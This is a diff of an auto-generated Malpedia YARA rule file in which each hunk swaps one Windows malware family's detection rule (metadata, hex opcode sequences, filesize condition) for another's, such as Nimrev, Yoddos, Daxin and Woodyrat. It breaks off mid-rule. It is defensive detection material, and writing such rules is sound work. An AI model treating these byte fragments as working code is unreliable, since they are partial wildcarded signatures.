-		id = "afd291db-bac5-5fe7-9f54-1a39c18ec08a"
+		id = "20b95ee4-71e8-5d91-8f08-c93eb8ecb6e9"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.grease"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.grease_auto.yar#L1-L226"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nimrev"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.nimrev_auto.yar#L1-L116"
 		license_url = "N/A"
-		logic_hash = "a7bbee8fe2b545d42dcf93b28bc05e2b116dcf88de40c793a23d0b5cc4cea918"
+		logic_hash = "c34627db4cecbf30356b0f5270911b9f9949d87d96e11dd97e4475658561ec16"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -85620,45 +85874,32 @@ rule MALPEDIA_Win_Grease_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 52 50 683f000f00 50 50 50 }
-		$sequence_1 = { 4533c0 488bd3 c744242804000000 4889442420 ff15???????? 488b4c2450 ff15???????? }
-		$sequence_2 = { 488d542470 41b93f000f00 4533c0 48c7c102000080 }
-		$sequence_3 = { 488b4c2460 48897c2440 488d442450 4889442438 }
-		$sequence_4 = { 4533c9 4533c0 4889442420 ff15???????? 85c0 7537 }
-		$sequence_5 = { 85c0 7534 488b4c2450 488d442458 41b904000000 4533c0 488bd3 }
-		$sequence_6 = { 4889442438 48897c2430 4533c0 c74424283f000f00 897c2420 }
-		$sequence_7 = { 48c7c102000080 c74424281f000200 895c2420 ff15???????? 85c0 0f85e7000000 488b4c2460 }
-		$sequence_8 = { 48895c2440 48895c2458 895c2460 48895c2468 }
-		$sequence_9 = { 75f7 2bc2 8bd0 8d442424 }
-		$sequence_10 = { f2ae f7d1 49 52 8d440902 8d8c242c010000 }
-		$sequence_11 = { 68???????? 51 e8???????? 83c40c 53 8d942438050000 52 }
-		$sequence_12 = { 51 889c244c050000 e8???????? 83c418 53 }
-		$sequence_13 = { 756f 68dc000000 8d94245c040000 53 }
-		$sequence_14 = { 68???????? 52 c744243804000000 ff15???????? 85c0 }
-		$sequence_15 = { 50 e8???????? 8b35???????? 83c438 6a00 8d8c240c010000 51 }
-		$sequence_16 = { 7405 80443420e0 46 3bf7 0f82eafdffff }
-		$sequence_17 = { 52 6a04 53 68???????? 50 895c242c ffd5 }
-		$sequence_18 = { 3c5a 7708 0420 8bcb 88443420 33c0 8a443420 }
-		$sequence_19 = { c684342406000063 e9???????? c68434240600006c e9???????? }
-		$sequence_20 = { ff249560424000 c68434140200006d e9???????? c684341402000071 }
-		$sequence_21 = { e9???????? c644341465 e9???????? c644341475 }
-		$sequence_22 = { ff15???????? 85c0 7529 8b4c2410 }
+		$sequence_0 = { c1e002 01d0 01c0 29c1 89c8 83c030 }
+		$sequence_1 = { ffd0 90 e9???????? 90 }
+		$sequence_2 = { 89c1 e8???????? eb04 90 eb01 }
+		$sequence_3 = { e8???????? e8???????? eb04 90 eb01 }
+		$sequence_4 = { 83f001 84c0 7408 90 e8???????? eb01 }
+		$sequence_5 = { 0f95c0 8845f7 eb01 90 807df700 }
+		$sequence_6 = { 8b45ec ba00000000 89c1 e8???????? }
+		$sequence_7 = { 0f93c0 83f001 84c0 7408 90 e8???????? eb01 }
+		$sequence_8 = { 0f93c0 83f001 84c0 7408 90 e8???????? }
+		$sequence_9 = { 83f001 84c0 7408 90 }
 
 	condition:
-		7 of them and filesize < 278528
+		7 of them and filesize < 1141760
 }
-rule MALPEDIA_Win_Alphanc_Auto : FILE
+rule MALPEDIA_Win_Yoddos_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ebf0ef1c-787d-588a-9f36-5c61e5121c6c"
+		id = "773dcd86-3687-5c26-8a61-390a3a45554b"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.alphanc"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.alphanc_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.yoddos"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.yoddos_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "c1872178a4528cd6c6c1bbe8c32caefd5306a7f5c047a004c099269a20f7813d"
+		logic_hash = "8286010b7da9f1df882192411526cd0a211d255dea4daeff1ec9797cedceaf98"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -85672,32 +85913,32 @@ rule MALPEDIA_Win_Alphanc_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bda 81e3ff000000 8b1c9d18c54c00 81e3ff000000 33fb 8b5e04 33fb }
-		$sequence_1 = { 8d54245c 6a1a 52 e8???????? 8d7c2464 83c9ff 33c0 }
-		$sequence_2 = { 8b542420 8bd8 8d4601 50 52 53 e8???????? }
-		$sequence_3 = { a1???????? 83c410 85c0 0f85d7000000 68ca010000 68???????? 6a10 }
-		$sequence_4 = { e8???????? 3bc7 89442420 750d c744241041000000 e9???????? 8b442438 }
-		$sequence_5 = { 741d 03d6 52 51 50 e8???????? 8b54242c }
-		$sequence_6 = { 8d9424ec000000 85d2 7421 8d8424ec000000 53 50 e8???????? }
-		$sequence_7 = { 8bc5 5f 5e 5d 5b c3 6893000000 }
-		$sequence_8 = { c3 8b5558 8d4c2458 51 c644241741 899a74030000 8b4558 }
-		$sequence_9 = { c1e205 6a08 8d8a20074e00 51 53 53 }
+		$sequence_0 = { 90 b89dffffff 90 c685d0fdffff4b }
+		$sequence_1 = { ff15???????? ff35???????? ff15???????? 6880000000 53 68???????? c705????????01000000 }
+		$sequence_2 = { 90 b89dffffff 90 be04010000 8d858cfeffff 33db 56 }
+		$sequence_3 = { 33db 56 50 53 c645f043 c645f14f c645f24d }
+		$sequence_4 = { c6459863 c645996b c6459a2e c6459b63 }
+		$sequence_5 = { c9 c20400 55 8bec 81ec480d0000 53 56 }
+		$sequence_6 = { 889d27feffff c6853cfeffff77 c6853dfeffff77 c6853efeffff77 c6853ffeffff2e c68540feffff68 c68541feffff61 }
+		$sequence_7 = { 8d85e0fdffff 50 e8???????? 50 8d85c8fcffff 50 }
+		$sequence_8 = { c645d34c c645d46f c645d563 c645d661 c645d76c }
+		$sequence_9 = { e8???????? 83c410 8d85d4fbffff 53 50 }
 
 	condition:
-		7 of them and filesize < 2015232
+		7 of them and filesize < 557056
 }
-rule MALPEDIA_Win_Webbytea_Auto : FILE
+rule MALPEDIA_Win_Daxin_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "289bbfb0-4c87-5ec8-bb1c-f221332bf4ea"
+		id = "eb9db3c6-59a2-55fc-ab29-402a0b79069e"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webbytea"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.webbytea_auto.yar#L1-L116"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.daxin"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.daxin_auto.yar#L1-L145"
 		license_url = "N/A"
-		logic_hash = "5634a8f7fcf9d0a5da9524118130e9bacc28a4059c716e709153bee5aa0b255e"
+		logic_hash = "9f52c4014d6014a5dd41f71fe4bb65b03575c870c6d23007d187323e250b54a3"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -85711,34 +85952,39 @@ rule MALPEDIA_Win_Webbytea_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c68424f100000072 c68424f200000065 c68424f300000061 c68424f400000074 }
-		$sequence_1 = { ff15???????? 85c0 7444 41b904000000 }
-		$sequence_2 = { 8901 488d542430 488b4c2420 ff15???????? }
-		$sequence_3 = { c7042400000000 eb08 8b0424 ffc0 890424 8b442438 }
-		$sequence_4 = { ffc0 488b8c2488020000 8901 488d542430 488b4c2420 ff15???????? 85c0 }
-		$sequence_5 = { 8b00 ffc0 488b8c2488020000 8901 488d542430 488b4c2420 }
-		$sequence_6 = { 8b542438 891481 488b842488020000 8b00 ffc0 488b8c2488020000 8901 }
-		$sequence_7 = { ffc0 488b8c2488020000 8901 488d542430 488b4c2420 ff15???????? }
-		$sequence_8 = { 4803c8 488bc1 48c744243000000000 c744242800000000 }
-		$sequence_9 = { ffc0 890424 8b442438 390424 }
+		$sequence_0 = { 2bc2 d1f8 99 f7f9 }
+		$sequence_1 = { 413bd5 7209 438d443500 3bd0 7226 }
+		$sequence_2 = { e9???????? 448b4f04 4533c0 ba02000000 488bcb }
+		$sequence_3 = { 448b4004 0fb7c1 c1e910 66c1c008 0fb7d0 }
+		$sequence_4 = { 740d 488bcb e8???????? e9???????? 33c9 }
+		$sequence_5 = { 7508 488bc8 ff5028 eb02 33c0 }
+		$sequence_6 = { 57 4154 4883ec20 4533c0 }
+		$sequence_7 = { ff15???????? 884708 4c8b8380000000 4d85c0 }
+		$sequence_8 = { 885303 7e1b 8b74241c 8bcf }
+		$sequence_9 = { 8854243b 8b54243b 81e2ff000000 03c2 }
+		$sequence_10 = { 88540e07 885c3e08 7cd2 897e04 }
+		$sequence_11 = { 88543908 8a443108 02c2 25ff000000 }
+		$sequence_12 = { 8854243a 8b54243a 81e2ff000000 03c2 }
+		$sequence_13 = { 885017 8bd1 c1e902 f3a5 8bca }
+		$sequence_14 = { 88502a 8bda 8b4ca814 2bca }
 
 	condition:
-		7 of them and filesize < 552960
+		7 of them and filesize < 3475456
 }
-rule MALPEDIA_Win_Webc2_Greencat_Auto : FILE
+rule MALPEDIA_Win_Oldbait_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a0848a27-48e1-5e07-b0d1-bb056774f373"
+		id = "de1960aa-dffc-50a3-b5af-d60e93de2ed5"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_greencat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.webc2_greencat_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.oldbait"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.oldbait_auto.yar#L1-L227"
 		license_url = "N/A"
-		logic_hash = "b537e733fea445e18ae7f3686bce35348807c75f49bc5b86c1bc51245964fe49"
+		logic_hash = "56d5ee4ed7de5e4bf6d19f067af8af7a888733392a830afd56b63d7b093ebe45"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -85750,32 +85996,46 @@ rule MALPEDIA_Win_Webc2_Greencat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 5b b8???????? 53 50 50 33ff }
-		$sequence_1 = { e8???????? 83c414 33c9 3bfb 7632 }
-		$sequence_2 = { 59 59 8b45d4 3818 0f857dfeffff }
-		$sequence_3 = { 75c9 be00000200 397d08 7e08 }
-		$sequence_4 = { 33ff e8???????? 83c40c be???????? ff35???????? 56 }
-		$sequence_5 = { eb27 68???????? eb20 68???????? eb19 ff15???????? 3d26040000 }
-		$sequence_6 = { c20800 ff74240c ff74240c ff74240c ff710c ff15???????? c20c00 }
-		$sequence_7 = { c645e840 c645e94a c645eae6 c645eb1a c645ec14 885ded }
-		$sequence_8 = { 50 ff750c e8???????? 68???????? ff750c e8???????? 83c410 }
-		$sequence_9 = { 50 ff15???????? 3bc7 59 7405 a3???????? 8a45ff }
+		$sequence_0 = { 6a00 ff15???????? 85c0 7505 e9???????? 6a00 6880000000 }
+		$sequence_1 = { 8d70ff 85f6 7626 8b4510 }
+		$sequence_2 = { 8a09 888800b01800 ebda 8b45fc 0531b11800 }
+		$sequence_3 = { 837d2000 7432 66c7045f0d00 43 66c7045f0a00 }
+		$sequence_4 = { 57 8b7d08 8d70ff 85f6 }
+		$sequence_5 = { 8945f4 ff35???????? ff75fc ff55f4 5f 5e }
+		$sequence_6 = { 0145d8 33ff 8d837ff61800 803800 }
+		$sequence_7 = { 8bca 83f101 83e107 d3e8 30043a }
+		$sequence_8 = { 0145d4 41 c1ea04 75dc }
+		$sequence_9 = { 42 3bd6 894510 72da 8bc7 5f }
+		$sequence_10 = { 0145d8 8b45d8 3b45c8 7cc2 }
+		$sequence_11 = { 8bec 8b450c 56 33d2 }
+		$sequence_12 = { 01459c 8b45c8 8945f8 eb05 }
+		$sequence_13 = { 0145d8 8b45f0 ff45ec 0fb64004 }
+		$sequence_14 = { 0145d8 8bb54cffffff 56 ff55d0 }
+		$sequence_15 = { 0103 01451c 8b06 8bc8 c1e906 }
+		$sequence_16 = { 57 8945f0 8945f4 894dec 0f8387000000 895514 83651407 }
+		$sequence_17 = { f7d9 1bc9 f7d1 234d14 83f908 }
+		$sequence_18 = { a3???????? 8d85c0feffff 68???????? 50 ff55dc 8d8dc0feffff }
+		$sequence_19 = { 8d45f4 50 8d45dc 50 68???????? ff75f8 }
+		$sequence_20 = { 8d85bcfdffff 6a01 50 8d85c0feffff 50 68???????? }
+		$sequence_21 = { 83e007 0a1c30 0fb64437fe 03c2 }
+		$sequence_22 = { ffd6 ffd0 53 ff55e4 90 90 }
+		$sequence_23 = { 56 8b7514 3bc1 57 8945f0 8945f4 }
 
 	condition:
-		7 of them and filesize < 57344
+		7 of them and filesize < 172032
 }
-rule MALPEDIA_Win_Mim221_Auto : FILE
+rule MALPEDIA_Win_Woodyrat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "73f86bbf-82d0-5204-a2d1-b26dcb4711e9"
+		id = "55420983-c976-5f63-817e-19c52006bc78"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mim221"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mim221_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.woodyrat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.woodyrat_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "bd2938d5a81d44d76221abdf1ea92c7bf7be6210ea127474e453ccedb94f51d9"
+		logic_hash = "6c11e1a243653fb86d63eb1e0cef34e9f23e5fe6ae8acbf4e40cedaa8f4a73ea"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -85789,32 +86049,32 @@ rule MALPEDIA_Win_Mim221_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4c89442418 53 57 4883ec38 498bc1 498bd8 4c8bd2 }
-		$sequence_1 = { 56 57 4154 4c8bdc 4883ec38 488b05???????? 4c8d25f5b80000 }
-		$sequence_2 = { ff15???????? 85c0 0f84e5000000 c7442428ff000000 488d442470 4889442420 }
-		$sequence_3 = { 6689942478020000 66b92500 66898c247a020000 668984247c020000 668994247e020000 66c78424800200003b00 6689942482020000 }
-		$sequence_4 = { 57 4154 4155 4156 4157 4881ec80010000 48c7842428010000feffffff }
-		$sequence_5 = { 4883f905 72eb eb1d 488d842440050000 3910 7711 4883c101 }
-		$sequence_6 = { 66c74424666f00 66c74424686400 66c744246a6500 66c744246c5300 668944246e 66c74424707200 66c74424726900 }
-		$sequence_7 = { c3 4533c0 488d15be910100 498bc8 66666690 }
-		$sequence_8 = { 0f8c6b010000 8bc7 488d153b7b0100 412bc4 3bc5 0f8260ffffff e9???????? }
-		$sequence_9 = { 488bf8 483bc3 7504 33c0 eb58 498d5708 895c2430 }
+		$sequence_0 = { 884604 8bc6 890e 8b4df4 64890d00000000 59 5f }
+		$sequence_1 = { c645fc06 8bc4 8d4dc8 51 50 8d4dd4 }
+		$sequence_2 = { 0f8726020000 52 51 e8???????? 83c408 83c654 }
+		$sequence_3 = { 83ec08 8b4590 0f57c0 0f1107 8bf4 8945d4 0f114710 }
+		$sequence_4 = { 83ec18 c645fc03 8bf4 83ec18 8bcc 57 e8???????? }
+		$sequence_5 = { 894598 89459c 894d94 894da0 8945a4 660fd645a8 894db0 }
+		$sequence_6 = { 3d00100000 7227 8d4823 3bc8 0f868d070000 51 e8???????? }
+		$sequence_7 = { ffb5bcebffff e8???????? 8b45d4 8bf4 894604 8b45d8 894608 }
+		$sequence_8 = { 3bca 72b0 7704 3bc3 72aa 8b742410 }
+		$sequence_9 = { 8d047d02000000 50 ffb5acfeffff 51 e8???????? 8b8db0feffff 83c40c }
 
 	condition:
-		7 of them and filesize < 471040
+		7 of them and filesize < 785408
 }
-rule MALPEDIA_Win_Photolite_Auto : FILE
+rule MALPEDIA_Win_Bubblewrap_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b838fe06-7cef-5999-9706-bfe3b9dcfde8"
+		id = "0adb22b2-c291-5da7-a49f-6252c3b1a007"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.photolite"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.photolite_auto.yar#L1-L172"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bubblewrap"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.bubblewrap_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "5ed47a87d33839515eff080f5efa80e00a8db9b392140f3655d5bd0ad6753f13"
+		logic_hash = "0ab9a85f4803bb9809d1835ce4819efcd3e97bce18ea2653e803520f80f6784f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -85828,38 +86088,32 @@ rule MALPEDIA_Win_Photolite_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { b801000000 4883c430 5b c3 4883ec28 }
-		$sequence_1 = { 899504030000 8b85f8020000 8a85f4020000 84c0 751b 488bcb }
-		$sequence_2 = { 72ea 889da0010000 ba36a2b43b c785a40100005dc7c655 }
-		$sequence_3 = { 8a441140 320411 88840ce0000000 48ffc1 4883f920 72e2 }
-		$sequence_4 = { 84c0 751e 488bcb 8b848dd8040000 3566115674 89848dd8040000 4803cf }
-		$sequence_5 = { 0fb7d1 eb07 498d5602 4803d1 498bcc }
-		$sequence_6 = { 889df4020000 babea80905 c785f8020000d5cd7b6b c785fc020000dbc43a37 c7850003000090cc6569 899504030000 }
-		$sequence_7 = { 3510dd9977 89848da0000000 4803cf 493bce 72e5 488d95f0050000 }
-		$sequence_8 = { 83ff03 0f82e8feffff 0f1f840000000000 488b05???????? }
-		$sequence_9 = { 33d2 41b800800000 488bcf ffd0 0fb65310 }
-		$sequence_10 = { 7532 8d5001 33c9 41b8d18a3146 }
-		$sequence_11 = { 488bfa 488bf1 4d85c0 0f8482000000 4c8b15???????? 4d85d2 7516 }
-		$sequence_12 = { 488d8dc0000000 ff15???????? 4c8b05???????? c785e804000000010000 4d85c0 7516 418d5002 }
-		$sequence_13 = { b840000000 488d4c2450 0f1f4000 c60100 488d4901 4883e801 75f3 }
-		$sequence_14 = { 33c9 41b8f572993d e8???????? b988130000 }
-		$sequence_15 = { 4c897da0 448965d8 4c8965d0 e8???????? 3dc8000000 0f849d000000 488b5d28 }
+		$sequence_0 = { 8bc8 83e103 f3a4 8d4c2418 51 55 e8???????? }
+		$sequence_1 = { a1???????? 8b15???????? 83c404 f3a5 8b0d???????? a3???????? }
+		$sequence_2 = { c3 b940000000 33c0 8dbc24a9000000 c68424a800000000 }
+		$sequence_3 = { 750b 5f 5e 5d 5b 81c4a0ba0400 c3 }
+		$sequence_4 = { 0bc2 49 79f0 89442458 33c0 }
+		$sequence_5 = { 83c408 50 57 8b3d???????? ffd7 68???????? }
+		$sequence_6 = { 5d 5b 81c4a0ba0400 c3 8b442410 8d4c2464 898424a4000000 }
+		$sequence_7 = { 83c404 eb37 a1???????? 8b35???????? 50 ffd6 }
+		$sequence_8 = { 0f8feffeffff 5b 8d4d02 b856555555 f7e9 8bc2 5f }
+		$sequence_9 = { 33d2 89742414 8d6ced00 89542418 }
 
 	condition:
-		7 of them and filesize < 99328
+		7 of them and filesize < 57136
 }
-rule MALPEDIA_Win_Pittytiger_Rat_Auto : FILE
+rule MALPEDIA_Win_Agfspy_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ff8da921-664f-5df1-a82d-04fd7f26f2bd"
+		id = "10a5651b-99ec-562f-82a5-e11489c17110"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pittytiger_rat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.pittytiger_rat_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.agfspy"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.agfspy_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "8acc632550999ec997897892dc652dc9572154a1b019a4992ae2e09d0384f83b"
+		logic_hash = "2e86502162b077190fa9b6bc0039b0226221ca91b45f721fc1b45981eaf2202d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -85873,32 +86127,32 @@ rule MALPEDIA_Win_Pittytiger_Rat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7503 56 ffd3 6a50 68???????? 68???????? }
-		$sequence_1 = { 85c0 0f843d010000 8d8520fcffff 56 50 8d852cffffff 50 }
-		$sequence_2 = { 83c40c 8d45f4 50 6819010200 53 68???????? }
-		$sequence_3 = { ff7508 e8???????? 8d8600020000 50 8d85f8fbffff 68???????? 50 }
-		$sequence_4 = { 750a 68???????? e9???????? 8d85f8fdffff 56 }
-		$sequence_5 = { 3bc3 a3???????? 74d1 8d459c }
-		$sequence_6 = { 58 8903 eb2d 8d85fcfeffff 50 e8???????? }
-		$sequence_7 = { 0f85e8000000 8d45f4 897df4 50 8d85e0feffff 50 }
-		$sequence_8 = { be00010000 aa 56 8d85d0fdffff }
-		$sequence_9 = { 8945f0 33ff 397df0 743c 397df8 }
+		$sequence_0 = { 8b01 6a01 ff10 c645fc05 8bce 8b07 66c745e00100 }
+		$sequence_1 = { 745e 33c0 663b07 7457 50 50 50 }
+		$sequence_2 = { 03c0 03c7 83d600 3b5ddc 736e 8b55e4 ebaa }
+		$sequence_3 = { 8d4dd8 e8???????? 0f1005???????? 8bd0 c745e82e000000 c745ec2f000000 8955d8 }
+		$sequence_4 = { 25ff000000 740e 83f807 0f8557020000 e9???????? c745e400000000 }
+		$sequence_5 = { 64a300000000 894dc8 8b7508 8b7d0c 8bcf 8975d0 8b4608 }
+		$sequence_6 = { bb04000000 895de4 eb28 4e eba8 8b17 8b4a04 }
+		$sequence_7 = { 56 ff15???????? 33f6 8b9564ffffff 83fa10 722b 8b8d50ffffff }
+		$sequence_8 = { 3bcf 0f820a020000 8b55ec 8bc2 2bc1 83f801 }
+		$sequence_9 = { 75ed eb7c 83f85c 7403 50 eb6d 3bf9 }
 
 	condition:
-		7 of them and filesize < 2162688
+		7 of them and filesize < 1482752
 }
-rule MALPEDIA_Win_Donot_Auto : FILE
+rule MALPEDIA_Win_Felismus_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0d8c8de4-b5bc-5e41-9f0a-3ce84556a33b"
+		id = "82db284d-423c-5d27-9839-6fb28439fb0e"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.donot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.donot_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.felismus"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.felismus_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "c988e567c68890dfe0605ba69d12ded06e141c854ed633d34ee6899ee2b466e8"
+		logic_hash = "4546b8db4538dafe5bc8d041a61c766239a1afc6f98e209750b1eab9012fff52"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -85912,32 +86166,32 @@ rule MALPEDIA_Win_Donot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c7461407000000 668906 8b95ccfcffff 83fa08 7235 }
-		$sequence_1 = { 52 50 8b08 ff511c 6a0c e8???????? }
-		$sequence_2 = { 83fa08 7231 8b8dc8fdffff 8d145502000000 8bc1 81fa00100000 7210 }
-		$sequence_3 = { 8b06 8b4004 c70406???????? 8b06 8b5004 8d4290 }
-		$sequence_4 = { 8d8d68fdffff 6a20 ffb5c0fdffff 33c0 c78568fdffff00000000 c78578fdffff00000000 }
-		$sequence_5 = { 8b49fc 83c223 2bc1 83c0fc 83f81f 0f87b4150000 52 }
-		$sequence_6 = { 83f8ff 7507 33f6 e9???????? 6a00 50 }
-		$sequence_7 = { 50 e8???????? 8bb5e4e7ffff 8bc6 8b95e0e7ffff 2bc2 83f801 }
-		$sequence_8 = { e9???????? 833d????????00 0f858cc60000 8d0d50990310 ba1d000000 e8???????? 5a }
-		$sequence_9 = { 50 8d45f4 64a300000000 8b01 8d7968 8b4004 c744389878210410 }
+		$sequence_0 = { 55 8b2d???????? ffd5 8bbc24000a0000 b908000000 8d742420 53 }
+		$sequence_1 = { 51 8bcd e8???????? eb2e 83f803 7519 }
+		$sequence_2 = { 8bf0 e8???????? 83c418 8945e0 56 68???????? 50 }
+		$sequence_3 = { e9???????? 8b442410 5f c6450000 5e 5d 5b }
+		$sequence_4 = { 5b 81c4b4010000 c3 55 ffd3 8b4c2414 }
+		$sequence_5 = { 8a840620420110 884201 33c0 8a4102 }
+		$sequence_6 = { d3ee 8b0d???????? d3e7 8b4c2474 0bf7 8b7834 03f1 }
+		$sequence_7 = { 83c404 57 ff15???????? 8b5dec e9???????? b911000000 33c0 }
+		$sequence_8 = { 83c40c f2ae f7d1 2bf9 8d95f4fdffff 8bf7 8bfa }
+		$sequence_9 = { 33ff 85db 7e7f ff15???????? 99 b91a000000 }
 
 	condition:
-		7 of them and filesize < 626688
+		7 of them and filesize < 204800
 }
-rule MALPEDIA_Win_Curator_Auto : FILE
+rule MALPEDIA_Win_Breakthrough_Loader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "fa7637d1-ef72-55c1-9cd8-4047e79769b0"
+		id = "0193d887-590b-5255-aefc-27c1cd144cae"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.curator"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.curator_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.breakthrough_loader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.breakthrough_loader_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "385564603afac75ab1aef52e96073e79dd684407e092688731815c7fd2379a64"
+		logic_hash = "ea01661f3f714348cfd1bd7d048f5208e62d40484683d30237ed92dc307f011d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -85951,32 +86205,32 @@ rule MALPEDIA_Win_Curator_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488d0d54500300 ff15???????? 488b0d???????? 4533c0 8bd3 ff15???????? 488d0d35500300 }
-		$sequence_1 = { 448bcf b906000000 e8???????? 488b4b40 488bd3 e8???????? 488b4b48 }
-		$sequence_2 = { 0f8399010000 4c8b4dd8 448b65d0 4c894c2478 488b45c8 488b00 48635010 }
-		$sequence_3 = { 807cfe4100 740a c644fe4201 e8???????? 4084ed 7427 488b4320 }
-		$sequence_4 = { e8???????? 84c0 0f847e030000 e9???????? 4c8b7c2468 488b4608 488945c0 }
-		$sequence_5 = { 74c8 488bd3 4c8d05922a0500 83e23f 488bcb 48c1f906 }
-		$sequence_6 = { 4c8d357eb80800 488d85a0010000 4533e4 4889442428 488d9580080000 4533c9 4489642420 }
